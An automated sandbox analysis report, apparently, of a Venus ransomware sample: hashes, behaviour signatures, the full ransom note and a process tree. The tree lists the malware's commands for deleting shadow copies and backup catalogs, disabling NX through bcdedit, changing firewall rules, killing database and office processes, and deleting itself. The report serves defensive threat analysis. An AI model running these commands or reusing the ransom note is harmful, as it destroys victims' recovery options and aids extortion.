Overview

overview

10

Static

static

10

1c45c33e98...2a.exe

windows7-x64

10

1c45c33e98...2a.exe

windows10-2004-x64

10

Analysis

  • max time kernel
    127s
  • max time network
    129s
  • platform
    windows10-2004_x64
  • resource
    win10v2004-20221111-en
  • resource tags

    arch:x64arch:x86image:win10v2004-20221111-enlocale:en-usos:windows10-2004-x64system
  • submitted
    18-11-2022 09:06

Sharing

Copy URL
Twitter E-mail
Report Analysis Logs

General

  • Target

    1c45c33e9884cb10264c1a2a0255e72a.exe

  • Size

    225KB

  • MD5

    1c45c33e9884cb10264c1a2a0255e72a

  • SHA1

    1992336a5d752187c979e24a95a871d8932ade6d

  • SHA256

    fa7ba459236c7b27a0429f1961b992ab87fc8b3427469fd98bfc272ae6852063

  • SHA512

    ef8613f273ae04ae61c477ccaf81799f91d38b5f6453ebbdc39c05745cbab927849321f90547982016eefa43574efa1bedc5f90e9c7a5e38b70bc79e442ed9ad

  • SSDEEP

    6144:AeJmXCQwAhozkJQkRV50DErCMxgTw7ozFD254W:AQeCQwARQBD+GcopfW

Score
10/10
venusevasionpersistenceransomwarespywarestealer

Malware Config

Extracted

Path

C:\README.html

Ransom Note
<html><head><title>Venus</title><style type = "text/css">*{padding:0;margin:0}p{color:white}.f{background-color:#ff7c00;width:100%;margin-left:auto;margin-right:auto;height:100%}.c h1{color:white;line-height:80px}.r{word-break:break-all;float:left;width:100%;text-align:center}</style></head><body><div class="f"><div class="c"><h1 align="center">&lt;&lt;&lt;Venus&gt;&gt;&gt;</h1></div><div class="r"><p></br></br></br></br><strong>We downloaded and encrypted your data.</strong></br>Only we can decrypt your data.<br><strong>IMPORTANT!</strong><br> If you, your programmers or your friends would try to help you to decrypt the files it can cause data loss even after you pay.<br> In this case we will not be able to help you.<br>Do not play with files.</p><p>Do not rename encrypted files.<br>Do not try to decrypt your data using third party software, it may cause permanent data loss.<br>Decryption of your files with the help of third parties may cause increased price or you can become a victim of a scam.</br>-----------------------------------------------------</br>Contact and send this file to us:<br><strong><br>email:[email protected]<br>email:[email protected]<br>skype live:.cid.2eb1968719a82d39</strong><br><br>qOeN/Ee7Si2K1allYCfgKXW2nzZeNDQAdaIXLViSyyiGb79K17g6nH0rUyun2EPj geXx5pv04zP7pwdjZy2DHVuc12BS36YE7KIBCkxz3+6z+wunSmGZBJIxn7uqvq0a 3tIOwQolyfu3oynf1wt71EvoJldFa9j5SgtxtGxSQuva56PcUv1fEOftB0smJeon poG6VN1GHT6R3QbFu5kpS8gdw/A5F859fogG8EyLkiPdqFwmkAEeBKFKcxV7JCZW GU+u+sunmmZgOLRbL7do5qfSB1/gS4hx23aK2BMygTcfDsHEQrt6fNcCStyMQ6Wy eHFa9sYQ0AJjokJz8LuAEVurWROXMqqFLtgdYQWZd5n/uLOF0n8uz30t4y8iWE0g yyx9BbDGQMI8+Wh9mPkpeogB+fv8w4pMnNO1XT8y00VVKqtXsAt7irda7vFgJ4a5 OmoZ1orLX5PFbpnDFj76xq0+IMIqOvXxrIERP3AuaFwH41KG3sMbAgLWY6nOLQ3o qoY+JQqxqMgxMujx+Ch4lfEWELEBNKBO9xt4x+sciU7L8LqrU6Royl6kmRFZi3EV Bo4L88YzjpU60j7BSrRBVv7x6Kb8tCX02dWrBQtQX+1J11d+Z9HGuj9KYSjc3Bof lbaPBNwrids= </p></div></body></html></html></body></html>
Emails

us:<br><strong><br>email:[email protected]<br>email:[email protected]<br>skype

Extracted

Path

C:\Users\Admin\AppData\Local\Temp\30986266201972527219.hta

Ransom Note
<<<Venus>>> We downloaded and encrypted your data.Only we can decrypt your data.IMPORTANT! If you, your programmers or your friends would try to help you to decrypt the files it can cause data loss even after you pay. In this case we will not be able to help you. Do not play with files. Do not rename encrypted files. Do not try to decrypt your data using third party software, it may cause permanent data loss. Decryption of your files with the help of third parties may cause increased price or you can become a victim of a scam.-----------------------------------------------------Contact and send this file to us: email:[email protected] email:[email protected] skype live:.cid.2eb1968719a82d39
Emails

email:[email protected]

email:[email protected]

Signatures

  • Venus

    Venus is a ransomware first seen in 2022.

    ransomwarevenus
  • Venus Ransomware 5 IoCs
  • Deletes shadow copies 2 TTPs

    Ransomware often targets backup files to inhibit system recovery.

    ransomware
  • Modifies boot configuration data using bcdedit 1 TTPs 1 IoCs
    ransomwareevasion
  • Deletes backup catalog 3 TTPs 1 IoCs

    Uses wbadmin.exe to inhibit system recovery.

    ransomware
  • Executes dropped EXE 1 IoCs
  • Modifies Windows Firewall 1 TTPs 1 IoCs
    evasion
  • Modifies extensions of user files 6 IoCs

    Ransomware generally changes the extension on encrypted files.

    ransomware
  • Checks computer location settings 2 TTPs 2 IoCs

    Looks up country code configured in the registry, likely geofence.

  • Reads user/profile data of web browsers 2 TTPs

    Infostealers often target stored browser data, which can include saved credentials etc.

    spywarestealer
  • Adds Run key to start application 2 TTPs 1 IoCs
    persistence
  • Drops desktop.ini file(s) 34 IoCs
  • Enumerates connected drives 3 TTPs 2 IoCs

    Attempts to read the root path of hard drives other than the default C: drive.

  • Sets desktop wallpaper using registry 2 TTPs 1 IoCs
    ransomware
  • Drops file in Program Files directory 64 IoCs
  • Drops file in Windows directory 2 IoCs
  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.

  • Checks SCSI registry key(s) 3 TTPs 4 IoCs

    SCSI information is often read in order to detect sandboxing environments.

  • Interacts with shadow copies 2 TTPs 1 IoCs

    Shadow copies are often targeted by ransomware to inhibit system recovery.

    ransomware
  • Kills process with taskkill 1 IoCs
    evasion
  • Modifies registry class 5 IoCs
  • Runs ping.exe 1 TTPs 1 IoCs
  • Suspicious use of AdjustPrivilegeToken 53 IoCs
  • Suspicious use of WriteProcessMemory 28 IoCs

Processes

  • C:\Users\Admin\AppData\Local\Temp\1c45c33e9884cb10264c1a2a0255e72a.exe
    "C:\Users\Admin\AppData\Local\Temp\1c45c33e9884cb10264c1a2a0255e72a.exe"
    1⤵
    • Checks computer location settings
    • Adds Run key to start application
    • Drops file in Windows directory
    • Modifies registry class
    • Suspicious use of WriteProcessMemory
    PID:3508
    • C:\Windows\1c45c33e9884cb10264c1a2a0255e72a.exe
      "C:\Windows\1c45c33e9884cb10264c1a2a0255e72a.exe" g g g o n e123
      2⤵
      • Executes dropped EXE
      • Modifies extensions of user files
      • Checks computer location settings
      • Drops desktop.ini file(s)
      • Enumerates connected drives
      • Sets desktop wallpaper using registry
      • Drops file in Program Files directory
      • Drops file in Windows directory
      • Modifies registry class
      • Suspicious use of AdjustPrivilegeToken
      • Suspicious use of WriteProcessMemory
      PID:1160
      • C:\Windows\System32\cmd.exe
        /C netsh advfirewall firewall set rule group="File and Printer Sharing" new enable=Yes
        3⤵
        • Suspicious use of WriteProcessMemory
        PID:1612
        • C:\Windows\system32\netsh.exe
          netsh advfirewall firewall set rule group="File and Printer Sharing" new enable=Yes
          4⤵
          • Modifies Windows Firewall
          PID:2116
      • C:\Windows\System32\cmd.exe
        /C taskkill /F /IM msftesql.exe /IM sqlagent.exe /IM sqlbrowser.exe /IM sqlservr.exe /IM sqlwriter.exe /IM oracle.exe /IM ocssd.exe /IM dbsnmp.exe /IM synctime.exe /IM mydesktopqos.exe /IM agntsvc.exe /IM isqlplussvc.exe /IM xfssvccon.exe /IM mydesktopservice.exe /IM ocautoupds.exe /IM agntsvc.exe /IM agntsvc.exe /IM agntsvc.exe /IM encsvc.exe /IM firefoxconfig.exe /IM tbirdconfig.exe /IM ocomm.exe /IM mysqld.exe /IM mysqld-nt.exe /IM mysqld-opt.exe /IM dbeng50.exe /IM sqbcoreservice.exe /IM excel.exe /IM infopath.exe /IM msaccess.exe /IM mspub.exe /IM onenote.exe /IM outlook.exe /IM powerpnt.exe /IM sqlservr.exe /IM thebat64.exe /IM thunderbird.exe /IM winword.exe /IM wordpad.exe
        3⤵
        • Suspicious use of WriteProcessMemory
        PID:3328
        • C:\Windows\system32\taskkill.exe
          taskkill /F /IM msftesql.exe /IM sqlagent.exe /IM sqlbrowser.exe /IM sqlservr.exe /IM sqlwriter.exe /IM oracle.exe /IM ocssd.exe /IM dbsnmp.exe /IM synctime.exe /IM mydesktopqos.exe /IM agntsvc.exe /IM isqlplussvc.exe /IM xfssvccon.exe /IM mydesktopservice.exe /IM ocautoupds.exe /IM agntsvc.exe /IM agntsvc.exe /IM agntsvc.exe /IM encsvc.exe /IM firefoxconfig.exe /IM tbirdconfig.exe /IM ocomm.exe /IM mysqld.exe /IM mysqld-nt.exe /IM mysqld-opt.exe /IM dbeng50.exe /IM sqbcoreservice.exe /IM excel.exe /IM infopath.exe /IM msaccess.exe /IM mspub.exe /IM onenote.exe /IM outlook.exe /IM powerpnt.exe /IM sqlservr.exe /IM thebat64.exe /IM thunderbird.exe /IM winword.exe /IM wordpad.exe
          4⤵
          • Kills process with taskkill
          • Suspicious use of AdjustPrivilegeToken
          PID:212
      • C:\Windows\System32\cmd.exe
        /C wbadmin delete catalog -quiet && vssadmin.exe delete shadows /all /quiet && bcdedit.exe /set {current} nx AlwaysOff && wmic SHADOWCOPY DELETE
        3⤵
        • Suspicious use of WriteProcessMemory
        PID:6052
        • C:\Windows\system32\wbadmin.exe
          wbadmin delete catalog -quiet
          4⤵
          • Deletes backup catalog
          PID:6100
        • C:\Windows\system32\vssadmin.exe
          vssadmin.exe delete shadows /all /quiet
          4⤵
          • Interacts with shadow copies
          PID:816
        • C:\Windows\system32\bcdedit.exe
          bcdedit.exe /set {current} nx AlwaysOff
          4⤵
          • Modifies boot configuration data using bcdedit
          PID:6132
        • C:\Windows\System32\Wbem\WMIC.exe
          wmic SHADOWCOPY DELETE
          4⤵
          • Suspicious use of AdjustPrivilegeToken
          PID:268
      • C:\Windows\SysWOW64\mshta.exe
        "C:\Windows\SysWOW64\mshta.exe" "C:\Users\Admin\AppData\Local\Temp\30986266201972527219.hta" {1E460BD7-F1C3-4B2E-88BF-4E770A288AF5}{1E460BD7-F1C3-4B2E-88BF-4E770A288AF5}
        3⤵
          PID:2064
      • C:\Windows\System32\cmd.exe
        /c ping localhost -n 3 > nul & del C:\Users\Admin\AppData\Local\Temp\1c45c33e9884cb10264c1a2a0255e72a.exe
        2⤵
        • Suspicious use of WriteProcessMemory
        PID:4396
        • C:\Windows\system32\PING.EXE
          ping localhost -n 3
          3⤵
          • Runs ping.exe
          PID:3824
    • C:\Windows\system32\wbengine.exe
      "C:\Windows\system32\wbengine.exe"
      1⤵
      • Suspicious use of AdjustPrivilegeToken
      PID:6136
    • C:\Windows\System32\vdsldr.exe
      C:\Windows\System32\vdsldr.exe -Embedding
      1⤵
        PID:3120
      • C:\Windows\System32\vds.exe
        C:\Windows\System32\vds.exe
        1⤵
        • Checks SCSI registry key(s)
        PID:5848
      • C:\Windows\system32\vssvc.exe
        C:\Windows\system32\vssvc.exe
        1⤵
        • Suspicious use of AdjustPrivilegeToken
        PID:5972

      Network

      MITRE ATT&CK Enterprise v6

      Replay Monitor

      Loading Replay Monitor...

      Downloads

      • C:\Users\Admin\AppData\Local\Temp\30986266201972527219.hta
        Filesize

        1KB

        MD5

        8103aa0a52830e860d4e8457864e3b99

        SHA1

        9c0ed2ecd13d4fe060f76b9a3687cc113a0bedba

        SHA256

        1da12388514e57bf5e2c3345e7ca3e6b1eba62617a5c27a1db73280e3a1429dc

        SHA512

        69ad2a795c5ea0aa3b7e2d8584b1579c42f59f89bae4c3d608e5046a6ed7ab2d8903fcde3f57dea0845aa919f719b7253d9d8582a85787d0679ca1fa52af7416

        Download Submit

      • C:\Windows\1c45c33e9884cb10264c1a2a0255e72a.exe
        Filesize

        225KB

        MD5

        1c45c33e9884cb10264c1a2a0255e72a

        SHA1

        1992336a5d752187c979e24a95a871d8932ade6d

        SHA256

        fa7ba459236c7b27a0429f1961b992ab87fc8b3427469fd98bfc272ae6852063

        SHA512

        ef8613f273ae04ae61c477ccaf81799f91d38b5f6453ebbdc39c05745cbab927849321f90547982016eefa43574efa1bedc5f90e9c7a5e38b70bc79e442ed9ad

        Download Submit

      • C:\Windows\1c45c33e9884cb10264c1a2a0255e72a.exe
        Filesize

        225KB

        MD5

        1c45c33e9884cb10264c1a2a0255e72a

        SHA1

        1992336a5d752187c979e24a95a871d8932ade6d

        SHA256

        fa7ba459236c7b27a0429f1961b992ab87fc8b3427469fd98bfc272ae6852063

        SHA512

        ef8613f273ae04ae61c477ccaf81799f91d38b5f6453ebbdc39c05745cbab927849321f90547982016eefa43574efa1bedc5f90e9c7a5e38b70bc79e442ed9ad

        Download Submit

      • memory/1160-143-0x0000000000400000-0x000000000043E000-memory.dmp

        Filesize

        248KB

        Download

      • memory/1160-142-0x0000000000400000-0x000000000043E000-memory.dmp

        Filesize

        248KB

        Download

      • memory/3508-132-0x0000000000400000-0x000000000043E000-memory.dmp

        Filesize

        248KB

        Download